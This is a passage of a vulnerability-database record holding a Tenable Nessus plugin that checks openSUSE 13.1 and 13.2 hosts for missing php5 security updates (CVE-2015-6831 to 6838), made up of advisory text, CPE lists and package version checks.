"cvelist": ["CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2-mod_php5", "p-cpe:/a:novell:opensuse:apache2-mod_php5-debuginfo", "p-cpe:/a:novell:opensuse:php5", "p-cpe:/a:novell:opensuse:php5-bcmath", "p-cpe:/a:novell:opensuse:php5-bcmath-debuginfo", "p-cpe:/a:novell:opensuse:php5-bz2", "p-cpe:/a:novell:opensuse:php5-bz2-debuginfo", "p-cpe:/a:novell:opensuse:php5-calendar", "p-cpe:/a:novell:opensuse:php5-calendar-debuginfo", "p-cpe:/a:novell:opensuse:php5-ctype", "p-cpe:/a:novell:opensuse:php5-ctype-debuginfo", "p-cpe:/a:novell:opensuse:php5-curl", "p-cpe:/a:novell:opensuse:php5-curl-debuginfo", "p-cpe:/a:novell:opensuse:php5-dba", "p-cpe:/a:novell:opensuse:php5-dba-debuginfo", "p-cpe:/a:novell:opensuse:php5-debuginfo", "p-cpe:/a:novell:opensuse:php5-debugsource", "p-cpe:/a:novell:opensuse:php5-devel", "p-cpe:/a:novell:opensuse:php5-dom", 
"p-cpe:/a:novell:opensuse:php5-dom-debuginfo", "p-cpe:/a:novell:opensuse:php5-enchant", "p-cpe:/a:novell:opensuse:php5-enchant-debuginfo", "p-cpe:/a:novell:opensuse:php5-exif", "p-cpe:/a:novell:opensuse:php5-exif-debuginfo", "p-cpe:/a:novell:opensuse:php5-fastcgi", "p-cpe:/a:novell:opensuse:php5-fastcgi-debuginfo", "p-cpe:/a:novell:opensuse:php5-fileinfo", "p-cpe:/a:novell:opensuse:php5-fileinfo-debuginfo", "p-cpe:/a:novell:opensuse:php5-firebird", "p-cpe:/a:novell:opensuse:php5-firebird-debuginfo", "p-cpe:/a:novell:opensuse:php5-fpm", "p-cpe:/a:novell:opensuse:php5-fpm-debuginfo", "p-cpe:/a:novell:opensuse:php5-ftp", "p-cpe:/a:novell:opensuse:php5-ftp-debuginfo", "p-cpe:/a:novell:opensuse:php5-gd", "p-cpe:/a:novell:opensuse:php5-gd-debuginfo", "p-cpe:/a:novell:opensuse:php5-gettext", "p-cpe:/a:novell:opensuse:php5-gettext-debuginfo", "p-cpe:/a:novell:opensuse:php5-gmp", "p-cpe:/a:novell:opensuse:php5-gmp-debuginfo", "p-cpe:/a:novell:opensuse:php5-iconv", "p-cpe:/a:novell:opensuse:php5-iconv-debuginfo", "p-cpe:/a:novell:opensuse:php5-imap", "p-cpe:/a:novell:opensuse:php5-imap-debuginfo", "p-cpe:/a:novell:opensuse:php5-intl", "p-cpe:/a:novell:opensuse:php5-intl-debuginfo", "p-cpe:/a:novell:opensuse:php5-json", "p-cpe:/a:novell:opensuse:php5-json-debuginfo", "p-cpe:/a:novell:opensuse:php5-ldap", "p-cpe:/a:novell:opensuse:php5-ldap-debuginfo", "p-cpe:/a:novell:opensuse:php5-mbstring", "p-cpe:/a:novell:opensuse:php5-mbstring-debuginfo", "p-cpe:/a:novell:opensuse:php5-mcrypt", "p-cpe:/a:novell:opensuse:php5-mcrypt-debuginfo", "p-cpe:/a:novell:opensuse:php5-mssql", "p-cpe:/a:novell:opensuse:php5-mssql-debuginfo", "p-cpe:/a:novell:opensuse:php5-mysql", "p-cpe:/a:novell:opensuse:php5-mysql-debuginfo", "p-cpe:/a:novell:opensuse:php5-odbc", "p-cpe:/a:novell:opensuse:php5-odbc-debuginfo", "p-cpe:/a:novell:opensuse:php5-opcache", "p-cpe:/a:novell:opensuse:php5-opcache-debuginfo", "p-cpe:/a:novell:opensuse:php5-openssl", "p-cpe:/a:novell:opensuse:php5-openssl-debuginfo", 
"p-cpe:/a:novell:opensuse:php5-pcntl", "p-cpe:/a:novell:opensuse:php5-pcntl-debuginfo", "p-cpe:/a:novell:opensuse:php5-pdo", "p-cpe:/a:novell:opensuse:php5-pdo-debuginfo", "p-cpe:/a:novell:opensuse:php5-pear", "p-cpe:/a:novell:opensuse:php5-pgsql", "p-cpe:/a:novell:opensuse:php5-pgsql-debuginfo", "p-cpe:/a:novell:opensuse:php5-phar", "p-cpe:/a:novell:opensuse:php5-phar-debuginfo", "p-cpe:/a:novell:opensuse:php5-posix", "p-cpe:/a:novell:opensuse:php5-posix-debuginfo", "p-cpe:/a:novell:opensuse:php5-pspell", "p-cpe:/a:novell:opensuse:php5-pspell-debuginfo", "p-cpe:/a:novell:opensuse:php5-readline", "p-cpe:/a:novell:opensuse:php5-readline-debuginfo", "p-cpe:/a:novell:opensuse:php5-shmop", "p-cpe:/a:novell:opensuse:php5-shmop-debuginfo", "p-cpe:/a:novell:opensuse:php5-snmp", "p-cpe:/a:novell:opensuse:php5-snmp-debuginfo", "p-cpe:/a:novell:opensuse:php5-soap", "p-cpe:/a:novell:opensuse:php5-soap-debuginfo", "p-cpe:/a:novell:opensuse:php5-sockets", "p-cpe:/a:novell:opensuse:php5-sockets-debuginfo", "p-cpe:/a:novell:opensuse:php5-sqlite", "p-cpe:/a:novell:opensuse:php5-sqlite-debuginfo", "p-cpe:/a:novell:opensuse:php5-suhosin", "p-cpe:/a:novell:opensuse:php5-suhosin-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvmsg", "p-cpe:/a:novell:opensuse:php5-sysvmsg-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvsem", "p-cpe:/a:novell:opensuse:php5-sysvsem-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvshm", "p-cpe:/a:novell:opensuse:php5-sysvshm-debuginfo", "p-cpe:/a:novell:opensuse:php5-tidy", "p-cpe:/a:novell:opensuse:php5-tidy-debuginfo", "p-cpe:/a:novell:opensuse:php5-tokenizer", "p-cpe:/a:novell:opensuse:php5-tokenizer-debuginfo", "p-cpe:/a:novell:opensuse:php5-wddx", "p-cpe:/a:novell:opensuse:php5-wddx-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlreader", "p-cpe:/a:novell:opensuse:php5-xmlreader-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlrpc", "p-cpe:/a:novell:opensuse:php5-xmlrpc-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlwriter", 
"p-cpe:/a:novell:opensuse:php5-xmlwriter-debuginfo", "p-cpe:/a:novell:opensuse:php5-xsl", "p-cpe:/a:novell:opensuse:php5-xsl-debuginfo", "p-cpe:/a:novell:opensuse:php5-zip", "p-cpe:/a:novell:opensuse:php5-zip-debuginfo", "p-cpe:/a:novell:opensuse:php5-zlib", "p-cpe:/a:novell:opensuse:php5-zlib-debuginfo", "cpe:/o:novell:opensuse:13.1", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2015-609.NASL", "href": "https://www.tenable.com/plugins/nessus/86183", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-609.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86183);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-6831\", \"CVE-2015-6832\", \"CVE-2015-6833\", \"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n\n script_name(english:\"openSUSE Security Update : php5 (openSUSE-2015-609)\");\n script_summary(english:\"Check for the openSUSE-2015-609 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The PHP5 script interpreter was updated to fix various security \nissues :\n\n - CVE-2015-6831: A use after free vulnerability in\n unserialize() has been fixed which could be used to\n crash php or potentially execute code. [bnc#942291]\n [bnc#942294] [bnc#942295]\n\n - CVE-2015-6832: A dangling pointer in the unserialization\n of ArrayObject items could be used to crash php or\n potentially execute code. 
[bnc#942293]\n\n - CVE-2015-6833: A directory traversal when extracting ZIP\n files could be used to overwrite files outside of\n intended area. [bnc#942296]\n\n - CVE-2015-6834: A Use After Free Vulnerability in\n unserialize() has been fixed which could be used to\n crash php or potentially execute code. [bnc#945403] \n\n - CVE-2015-6835: A Use After Free Vulnerability in session\n unserialize() has been fixed which could be used to\n crash php or potentially execute code. [bnc#945402]\n\n - CVE-2015-6836: A SOAP serialize_function_call() type\n confusion leading to remote code execution problem was\n fixed. [bnc#945428]\n\n - CVE-2015-6837 CVE-2015-6838: Two NULL pointer\n dereferences in the XSLTProcessor class were fixed.\n [bnc#945412]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=942291\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=942293\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=942294\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=942295\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=942296\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=945402\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=945403\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=945412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=945428\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php5 packages.\");\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-firebird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-firebird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:php5-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:php5-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-opcache-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"apache2-mod_php5-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"apache2-mod_php5-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-bcmath-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-bcmath-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-bz2-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-bz2-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-calendar-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-calendar-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ctype-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ctype-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-curl-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-curl-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-dba-5.4.20-67.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.1\", reference:\"php5-dba-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-debugsource-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-devel-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-dom-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-dom-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-enchant-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-enchant-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-exif-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-exif-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fastcgi-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fastcgi-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fileinfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fileinfo-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-firebird-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-firebird-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fpm-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fpm-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ftp-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ftp-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gd-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gd-debuginfo-5.4.20-67.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.1\", reference:\"php5-gettext-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gettext-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gmp-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gmp-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-iconv-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-iconv-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-imap-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-imap-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-intl-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-intl-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-json-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-json-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ldap-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ldap-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mbstring-5.4.20-67.1\") ) flag++;\nif ( 